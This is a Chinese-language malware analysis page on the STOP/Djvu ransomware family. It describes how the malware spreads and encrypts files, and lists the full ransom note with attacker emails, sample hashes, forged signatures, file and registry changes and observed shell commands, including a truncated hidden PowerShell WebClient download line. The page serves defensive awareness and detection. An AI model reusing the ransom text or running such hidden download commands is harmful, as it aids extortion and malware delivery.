停止Djvu勒索軟件

STOP勒索軟件家族(也稱為STOP Djvu Ransomware家族)是一種威脅很大的惡意軟件。儘管STOP Djvu的某些影響文件類型和加密文件擴展名的方法有所不同,但它們只是具有共同特徵並起源於STOP勒索軟件的多種威脅之一。
最初的STOP Ransomware早在2018年2月就被安全研究人員發現。但是,從那時起,它就得到了發展,其克隆和分支產品家族也不斷增加。分發STOP勒索軟件的主要方法是使用損壞的附件發送垃圾郵件活動。
STOP Djvu勒索軟件的執行方式類似於同類的其他勒索軟件威脅,對用戶可能在其係統中使用的關鍵文件進行加密和阻止訪問。可以對個人文件,圖片,文檔等進行加密,並且基本上禁止計算機上的所有用戶使用。 STOP Djvu勒索軟件最初於2018年12月被發現,這似乎是一個非常成功的在線感染活動。研究人員並未意識到勒索軟件的傳播方式,但後來的受害者報告說,他們在下載密鑰源或破解程序後發現了感染。一旦發生滲透,STOP Djvu勒索軟件會更改Windows設置,並在文件中附加一系列名稱,例如.djvu,.djvus,.djvuu,.uudjvu,.udjvu或.djvuq,以及最近的.promorad和.promock擴展名。較新的版本還沒有解密器,但是較舊的版本可以使用STOPDecrypter解密。建議用戶無論如何避免支付任何贖金。
用於阻止訪問文件的方法使用RSA加密算法。儘管對於沒有經驗的用戶來說,解密文件似乎很困難,但是絕對不需要付出任何努力來支付威脅背後的人員。在這種情況下通常會提供虛假承諾,因此用戶付款後很快就會發現它們被忽略了。
STOP Djvu勒索軟件的攻擊於2018年末首次報導。STOPDjvu的主要分發方法仍然是垃圾郵件,並且針對勒索軟件核心的調整相對較小。垃圾郵件中使用的大多數偽造的,受感染的附件都是啟用宏的辦公文檔或偽造的PDF文件,它們在受害者不知情的情況下運行勒索軟件。 STOP Djvu的行為也沒有太大變化-勒索軟件仍會刪除所有Shadow Volume快照以擺脫備份,然後開始加密受害者的文件。
贖金記錄有一些細微變化,該記錄另存為" _openme.txt"到受害者的桌面。贖金說明的文本可以在這裡找到:
'[贖金開始]
————————加密您的所有文件————————
不用擔心,您可以返回所有文件!
您所有的文件文檔,照片,數據庫和其他重要文件均使用最強的加密和唯一密鑰進行加密。
恢復文件的唯一方法是為您購買解密工具和唯一密鑰。
該軟件將解密您所有的加密文件。
我們為您提供什麼保證?
您可以從PC發送加密文件之一,而我們將免費對其進行解密。
但是我們只能免費解密1個文件. 文件中不得包含有價值的信息
不要嘗試使用第三方解密工具,因為它會破壞您的文件。
如果您在72小時內與我們聯繫,可享受50%的折扣。
——————————————————————————————————
要獲得此軟件,您需要在我們的電子郵件中寫信:
helpshadow@india.com
保留電子郵件地址與我們聯繫:
helpshadow@firemail.cc
您的個人ID:[字符串]
[贖金結束]'
勒索軟件將自身限制為最初以.djvu擴展名重命名加密的文件,這是一個很好的選擇,因為.djvu實際上是由AT&T Labs開發的合法文件格式,用於存儲掃描的文檔,有點類似於Adobe的.pdf。更高版本的勒索軟件對加密文件採用了一系列其他擴展名,包括" .chech","。luceq","。kroput1","。charck","。kropun","。luces","。pulsar1","。 ''.uudjvu','。djvur,'。tfude,'。tfudeq'和'.tfudet'。
可以使用安全研究人員Michael Gillespie開發的所謂的" STOPDecrypter"來免費解密STOP Djvu勒索軟件的某些菌株,並可以在線免費下載。
目錄
停止Djvu勒索軟件視頻
提示:把你的声音并观察在全屏模式下的视频。

停止Djvu勒索軟件 截图
分析报告
一般信息
| 姓: | STOP/DJVU Ransomware |
|---|---|
| 簽名狀態: | No Signature |
已知樣本
已知樣本
本節列出了其他據信與該家族有關的文件樣本。|
MD5:
def8a7bfe5fe47d95a95085d8dbc7a53
SHA1:
7182d4b2f55a560d83edf0824e119f71fa8422b6
SHA256:
B83855EA63E7F28396099A5B6E877BE537E78E4A50DF720262461A1D13B02192
文件大小:
6.29 MB , 6292105位元組
|
|
MD5:
a6b8c0cb178c31dd347554c3e5a0d5f8
SHA1:
91864f269d696ee80869cfeb3c9a204f8031a3bb
SHA256:
4FFB8E9ADF508662B5E51CBEC75B2E07CE1CBBFAAB873F72EDC7BAC385421E2C
文件大小:
3.47 MB , 3471869位元組
|
|
MD5:
2336c9624d9a44c393d354206226f508
SHA1:
ea7edc388ad62990f52b9ed40df26d20f4e20190
SHA256:
CE48ED04C92143B7E91F9665DD9337B2EE0B9CC1B5AEE534D26C09E084F8ABB0
文件大小:
1.36 MB , 1359918位元組
|
|
MD5:
42f32aa699bc45a3638ddeb325ebebc1
SHA1:
508cea3ba2bf04cc6851295f92bf0e752071f6b8
SHA256:
16532B38591B713395C288B11610494BCC4C4537BE492D43C54D66FEB7B95FA4
文件大小:
1.33 MB , 1328186位元組
|
|
MD5:
2391d41548b6432191f73edefa273928
SHA1:
620b714f84955aa7fb9a2f2cd528daa1621e18af
SHA256:
4D1EFAA3477B0B8D84025F3F0109E97ABA7CEB37F174B9DC79B7966CBB430959
文件大小:
3.36 MB , 3357556位元組
|
顯示更多
|
MD5:
710c3a1beb616d4aa7d5ed9a7f8848e4
SHA1:
326da9ddc0ea840e83f31fbf1f3377a06c911fe5
SHA256:
051DAB5E5247E25D6EB059A574383FB1EC99A5A4AAF9AA3694240FE25FA260AB
文件大小:
1.36 MB , 1364106位元組
|
|
MD5:
601b120a6f39f72847b2f581a3d5f158
SHA1:
0cc5781c1cfe6c5d034bd098229773e80e083732
SHA256:
BEC2BFF460615A35D4EA35BF25E9F89337E35E73441A4AC07562CE8E89BED818
文件大小:
4.86 MB , 4858569位元組
|
|
MD5:
a7b76a49f289081961f8f3824f0b62ca
SHA1:
6908790199785be7fc6c4eeb1fe426ee1b66cc0b
SHA256:
1A721E054386833AEBBF94C75871143376897E92C4A48278DDE95E6987634F45
文件大小:
1.41 MB , 1406899位元組
|
|
MD5:
9f37930d62a1e08f68aa0a72472e7a55
SHA1:
27706b3ff639e5dfa264a823dbe9229cf34ae153
SHA256:
29039902EEA4EE24C4C6368AA9B1D7F86BEC65ADA3ABDB0B92C1FEF311ACD31F
文件大小:
600.12 KB , 600124位元組
|
|
MD5:
7a18839fe61e9cde0e8fea3100acfb2b
SHA1:
9476c97a73e027016e9f6f2f20c2fb19264cd837
SHA256:
0271095F0AD5C6F26C9738ED5636E751B8868C1AE3B08D5D8C5218121D9FEEAF
文件大小:
316.83 KB , 316832位元組
|
|
MD5:
fe17d0f940a226e80cc18b4399da4ffc
SHA1:
cc1bd23b0c7ff5da8ff996717b3969b7ebb9c67b
SHA256:
D869A00DFA1BE0DF6D08BB72B790894D1861834D5E350F5DD54A70C3711BA713
文件大小:
1.36 MB , 1363661位元組
|
|
MD5:
ed83bea5600457af815495b10f235b87
SHA1:
14ac62ce3ae6b19186544e46ad7710d1814e3a9c
SHA256:
FC0AE843E31F77574448FF343F0E92A9F1953B43DC2495FFE2CA5F7F8E777401
文件大小:
9.59 MB , 9590154位元組
|
|
MD5:
8cc4ef6bfd98074474e53cefc0029d0a
SHA1:
7604b8cd9736a016748a1d2d1fe3eb9ec9db1bc9
SHA256:
72BE2A65C8E36058A40FB1EF582E944721F5D041044F454509242E00E6745198
文件大小:
1.41 MB , 1407173位元組
|
|
MD5:
75e7ec1010908f6cf964ee32c9d57fed
SHA1:
7cccec52318eadb6771ceef6404e19fc46ec8d07
SHA256:
A309D56010D51F07741773ABCC44C767EF99C1031DEFA575F07D11DD11F09E35
文件大小:
2.44 MB , 2442353位元組
|
Windows 可攜式執行檔屬性
- File doesn't have "Rich" header
- File doesn't have debug information
- File doesn't have exports table
- File doesn't have relocations information
- File doesn't have security information
- File has exports table
- File has TLS information
- File is 32-bit executable
- File is 64-bit executable
- File is either console or GUI application
顯示更多
- File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
- File is Native application (NOT .NET application)
- File is not packed
- IMAGE_FILE_DLL is not set inside PE header (Executable)
- IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)
文件圖示
文件圖示
本部分展示了在惡意軟體家族樣本中找到的圖標資源。惡意軟體通常會複製與合法軟體相關的圖標,以誤導用戶,使其誤以為該惡意軟體是安全的。Windows PE 版本資訊
Windows PE 版本資訊
本節顯示此系列樣本的 Windows 檔案版本資訊資料結構中已設定的值和屬性。為了誤導用戶,惡意軟體攻擊者通常會添加偽造的版本訊息,模仿合法軟體。| 姓名 | 价值 |
|---|---|
| Assembly Version | 1.4.1.0 |
| Comments | This installation was built with Inno Setup. |
| Company Name |
|
| File Description |
|
| File Version |
顯示更多
|
| Internal Name |
|
| Legal Copyright |
|
| Original Filename |
|
| Product Name |
顯示更多
|
| Product Version |
顯示更多
|
數位簽名
數位簽名
本節列出了該系列樣本所附帶的數位簽章。在分析和驗證數位簽章時,請務必確認簽章的根授權機構是知名且可信任的實體,且簽章狀態良好。惡意軟體通常使用不可信的「自簽名」數位簽名(惡意軟體作者可以輕鬆建立此類簽名,無需任何驗證)。惡意軟體也可能使用狀態無效的合法簽名,或使用來自可疑根授權機構且簽署者名稱虛假或具有誤導性的簽名。| 簽署者 | 根 | 地位 |
|---|---|---|
| win.rar GmbH | DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1 | Self Signed |
| win.rar GmbH | GlobalSign CodeSigning CA - SHA256 - G3 | Hash Mismatch |
文件特徵
- .NET
- 2+ executable sections
- big overlay
- fptable
- HighEntropy
- Inno
- InnoSetup Installer
- Installer Manifest
- Installer Version
- MZ (In Overlay)
顯示更多
- No Version Info
- Nullsoft Installer
- RAR (In Overlay)
- RARinO
- Run
- SusSec
- vb6
- WinRAR SFX
- WRARSFX
- x64
- x86
文件已修改
文件已修改
本節列出了該系列樣本建立、修改、移動和/或刪除的檔案。檔案系統活動可以幫助我們深入了解惡意軟體在作業系統上的運作方式。| 文件 | 屬性 |
|---|---|
| \device\namedpipe | Generic Read,Write Attributes |
| \device\namedpipe | Generic Write,Read Attributes |
| \device\namedpipe\gmdasllogger | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\is-13e8d.tmp\508cea3ba2bf04cc6851295f92bf0e752071f6b8_0001328186.tmp | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\is-2buvv.tmp\_isetup\_setup64.tmp | Generic Read,Write Data,Write Attributes,Write extended,Append data |
| c:\users\user\appdata\local\temp\is-88uan.tmp\ea7edc388ad62990f52b9ed40df26d20f4e20190_0001359918.tmp | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\is-8gkji.tmp\0cc5781c1cfe6c5d034bd098229773e80e083732_0004858569.tmp | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\is-af9e7.tmp\_isetup\_setup64.tmp | Generic Read,Write Data,Write Attributes,Write extended,Append data |
| c:\users\user\appdata\local\temp\is-bfiig.tmp\_isetup\_setup64.tmp | Generic Read,Write Data,Write Attributes,Write extended,Append data |
| c:\users\user\appdata\local\temp\is-dlucn.tmp\7604b8cd9736a016748a1d2d1fe3eb9ec9db1bc9_0001407173.tmp | Generic Write,Read Attributes |
顯示更多
| c:\users\user\appdata\local\temp\is-du263.tmp\326da9ddc0ea840e83f31fbf1f3377a06c911fe5_0001364106.tmp | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\is-i0kj9.tmp\6908790199785be7fc6c4eeb1fe426ee1b66cc0b_0001406899.tmp | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\is-jos42.tmp\_isetup\_setup64.tmp | Generic Read,Write Data,Write Attributes,Write extended,Append data |
| c:\users\user\appdata\local\temp\is-l4opd.tmp\cc1bd23b0c7ff5da8ff996717b3969b7ebb9c67b_0001363661.tmp | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\is-pk5hm.tmp\_isetup\_setup64.tmp | Generic Read,Write Data,Write Attributes,Write extended,Append data |
| c:\users\user\appdata\local\temp\is-r9udb.tmp\_isetup\_setup64.tmp | Generic Read,Write Data,Write Attributes,Write extended,Append data |
| c:\users\user\appdata\local\temp\is-shkd6.tmp\_isetup\_setup64.tmp | Generic Read,Write Data,Write Attributes,Write extended,Append data |
| c:\users\user\appdata\local\temp\nshfa46.tmp\chip.bmp | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\nshfa46.tmp\header.bmp | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\nshfa46.tmp\nsdialogs.dll | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\nshfa46.tmp\screenshot.bmp | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\nshfa46.tmp\system.dll | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\nshfa46.tmp\winrar-x64-721b1ru.exe | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\nshfa46.tmp\yandex.bmp | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\nshfa46.tmp\yandexbrowsersetup.exe | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\nsrfa35.tmp | Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete |
| c:\users\user\appdata\local\temp\nsva331.tmp\banner.dll | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\nsva331.tmp\nsexec.dll | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\nsva331.tmp\system.dll | Generic Write,Read Attributes |
註冊表修改
註冊表修改
本節列出了此系列樣本建立、修改和/或刪除的登錄項目和值。 Windows 登錄活動可以提供關於惡意軟體功能的寶貴資訊。此外,惡意軟體通常會建立註冊表值,以便在初始感染系統後自動啟動並無限期地持續存在。| 鍵::值 | 数据 | API名稱 |
|---|---|---|
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 | wk � 8�jg�B �� �6 �v�� 7� �� �� ۀ�� � T�B� ����� ���%�� 3bBx �<�� �!#��$kF$�� %`� %�&� &�-'�!(�(X�(�) ;)E)�`*J*9*�",=� -!R0P%1`1�1HO 5,]5�G>�� @V� @�*A��BB�� E�mF | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | 졷鑂셱ǜ | RegNtPreCreateKey |
Windows API 使用情況
Windows API 使用情況
本節列出了此系列樣本使用的 Windows API 呼叫。 Windows API 使用情況分析是一項寶貴的工具,可協助識別惡意活動,例如鍵盤記錄、安全權限提升、資料加密、資料外洩、幹擾防毒軟體以及網路請求篡改。| 類別 | API |
|---|---|
| Other Suspicious |
|
| Anti Debug |
|
| User Data Access |
|
| Process Manipulation Evasion |
|
| Process Shell Execute |
|
| Keyboard Access |
|
| Syscall Use |
顯示更多
|
| Encryption Used |
|
Shell指令執行
Shell指令執行
本節列出了此系列樣本運行的 Windows Shell 命令。惡意軟體經常利用 Windows Shell 指令進行惡意活動,例如提升安全權限、下載和啟動其他惡意軟體、利用漏洞、收集和竊取資料以及隱藏惡意活動。
"C:\Users\Lehsoaco\AppData\Local\Temp\is-88UAN.tmp\ea7edc388ad62990f52b9ed40df26d20f4e20190_0001359918.tmp" /SL5="$5036E,928289,131584,c:\users\user\downloads\ea7edc388ad62990f52b9ed40df26d20f4e20190_0001359918"
|
"C:\Users\Dfhrhqtz\AppData\Local\Temp\is-13E8D.tmp\508cea3ba2bf04cc6851295f92bf0e752071f6b8_0001328186.tmp" /SL5="$802E8,896816,131584,c:\users\user\downloads\508cea3ba2bf04cc6851295f92bf0e752071f6b8_0001328186"
|
"C:\Users\Eberzneu\AppData\Local\Temp\is-DU263.tmp\326da9ddc0ea840e83f31fbf1f3377a06c911fe5_0001364106.tmp" /SL5="$30364,932379,131584,c:\users\user\downloads\326da9ddc0ea840e83f31fbf1f3377a06c911fe5_0001364106"
|
"C:\Users\Qxnqehmu\AppData\Local\Temp\is-8GKJI.tmp\0cc5781c1cfe6c5d034bd098229773e80e083732_0004858569.tmp" /SL5="$402E8,3435751,309760,c:\users\user\downloads\0cc5781c1cfe6c5d034bd098229773e80e083732_0004858569"
|
"C:\Users\Qlwpcgcn\AppData\Local\Temp\is-I0KJ9.tmp\6908790199785be7fc6c4eeb1fe426ee1b66cc0b_0001406899.tmp" /SL5="$30336,975597,131584,c:\users\user\downloads\6908790199785be7fc6c4eeb1fe426ee1b66cc0b_0001406899"
|
顯示更多
powershell -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "try { $WebClient = New-Object System.Net.WebClient
|
"C:\Users\Czxnhiuo\AppData\Local\Temp\is-L4OPD.tmp\cc1bd23b0c7ff5da8ff996717b3969b7ebb9c67b_0001363661.tmp" /SL5="$40356,931898,131584,c:\users\user\downloads\cc1bd23b0c7ff5da8ff996717b3969b7ebb9c67b_0001363661"
|
"C:\Users\Rziyzfeg\AppData\Local\Temp\is-DLUCN.tmp\7604b8cd9736a016748a1d2d1fe3eb9ec9db1bc9_0001407173.tmp" /SL5="$1C02AC,975756,131584,c:\users\user\downloads\7604b8cd9736a016748a1d2d1fe3eb9ec9db1bc9_0001407173"
|


